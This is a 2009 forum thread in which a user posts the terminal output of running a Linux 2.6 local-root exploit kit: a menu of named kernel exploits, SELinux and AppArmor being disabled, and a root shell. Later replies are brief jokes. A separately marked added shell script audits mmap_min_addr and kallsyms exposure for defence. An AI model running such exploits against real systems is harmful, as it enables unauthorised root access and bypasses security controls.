Hypography Science Forums: Ridiculous 2.6 Exploit - Hypography Science Forums


#1 alexander

Posted 19 November 2009 - 12:23 PM

So the other day, this guy, spender, found an exploit in the linux kernel that disables selinux rules, affecting basically almost every 2.6 kernel... payload? root, i call it root in one easy step, here's output from a run i did on my system earlier on:

alexander@alex:~/$ uname -a
Linux alex 2.6.31-14-generic #48-Ubuntu SMP Fri Oct 16 14:05:01 UTC 2009 x86_64 GNU/Linux
alexander@alex:~/$ id
uid=1000(alexander) gid=1000(alexander) groups=4(adm),20(dialout),24(cdrom),46(plugdev),110(lpadmin),111(sambashare),112(admin),126(burning),1000(alexander)
alexander@alex:~/$ ./run_exploit.sh 
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...failed.
Compiling exp_wunderbar.c...OK.
 [+] MAPPED ZERO PAGE!
Choose your exploit:
 [0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root
 [1] MooseCox: Linux-2.X->Linux.2.6.31.unfixed pipe local root
 [2] Paokara: Linux 2.6.19->2.6.31.1 eCryptfs local root
 [3] Powerglove: Linux 2.6.31 perf_counter local root
 [4] The Rebel: Linux < 2.6.19 udp_sendmsg() local root
 [5] Wunderbar Emporium: Linux 2.X sendpage() local root
 [6] Exit
> 1
 ------------------------------------------------------------------------------
 [+] Resolved selinux_enforcing to 0xffffffff819b7ba8
 [+] Resolved selinux_enabled to 0xffffffff819b7ba4
 [+] Resolved apparmor_enabled to 0xffffffff817f7184
 [+] Resolved security_ops to 0xffffffff819b6330
 [+] Resolved default_security_ops to 0xffffffff817b5120
 [+] Resolved sel_read_enforce to 0xffffffff8122dc20
 [+] Resolved audit_enabled to 0xffffffff81976324
 [+] Resolved commit_creds to 0xffffffff8107f270
 [+] Resolved prepare_kernel_cred to 0xffffffff8107f480
 [+] Using newer pipe_inode_info layout
 [+] We'll let this go for a while if needed...
 [+] got ring0!
 [+] detected cred support
 [+] Disabled security of : nothing, what an insecure machine!
 [+] Got root!
sh: gthumb: not found
# id
uid=0(root) gid=0(root)
# 
if that's not ridiculous, i don't know what is....

The sad part is that this is not an issue found in selinux code itself, it's a compiler optimization problem, which is crazy, right? So, question is, how do we protect from these types of exploits in the future, and also dark wizards?
~ Sun, number 1 cause of global warming.


Caution: some thinking required when using this product, keep your axons and dendrites inside your head at all times.
0
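
Added example, not part of the original post and not code from the exploit's author: a defender-side check for the two preconditions visible in the log above, the "MAPPED ZERO PAGE" line and the "Resolved <symbol> to <address>" lines. It assumes vm.mmap_min_addr and /proc/kallsyms are the relevant controls on the host being audited; the function names are hypothetical.

```shell
#!/bin/sh
# Added example (not from the thread): audit two settings that relate to the
# "MAPPED ZERO PAGE" and "Resolved <symbol> to <address>" lines in the log.

# Classify a vm.mmap_min_addr value: 0 lets unprivileged code map page zero.
classify_mmap_min_addr() {
    case "$1" in
        ''|*[!0-9]*) echo unknown ;;   # missing or non-numeric value
        *) if [ "$1" -eq 0 ]; then echo weak; else echo ok; fi ;;
    esac
}

# Classify one /proc/kallsyms line ("<hex addr> <type> <name>"):
# an all-zero address means the kernel hid it from this user.
classify_kallsyms_line() {
    addr=${1%% *}                      # first whitespace-separated field
    case "$addr" in
        ''|*[!0-9a-fA-F]*) echo unknown ;;
        *[!0]*) echo exposed ;;        # at least one non-zero hex digit
        *) echo hidden ;;
    esac
}

# Run both checks against the live host; prints one line per finding.
audit_host() {
    min_addr=$(cat /proc/sys/vm/mmap_min_addr 2>/dev/null || true)
    echo "vm.mmap_min_addr=${min_addr:-?}: $(classify_mmap_min_addr "$min_addr")"
    line=$(grep -m1 ' commit_creds$' /proc/kallsyms 2>/dev/null || true)
    echo "commit_creds in /proc/kallsyms: $(classify_kallsyms_line "$line")"
}

audit_host
```

Run it as the unprivileged account you care about, since /proc/kallsyms output depends on the reader's privileges.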

#2 freeztar


Posted 19 November 2009 - 01:28 PM

Not in the code itself, but from the compiler? That must make debugging a severe pita. :phones:
Hypography Science Forums Moderator
---
"There are no passengers on Spaceship Earth. We are all crew." - Marshall McLuhan

"We must not forget that when radium was discovered no one knew that it would prove useful in hospitals. The work was one of pure science. And this is a proof that scientific work must not be considered from the point of view of the direct usefulness of it." - Marie Curie
0

#3 alexander


Posted 19 November 2009 - 05:10 PM

yeah it's crazy, i for one, may never optimize code ever again.... (lol not really)
0
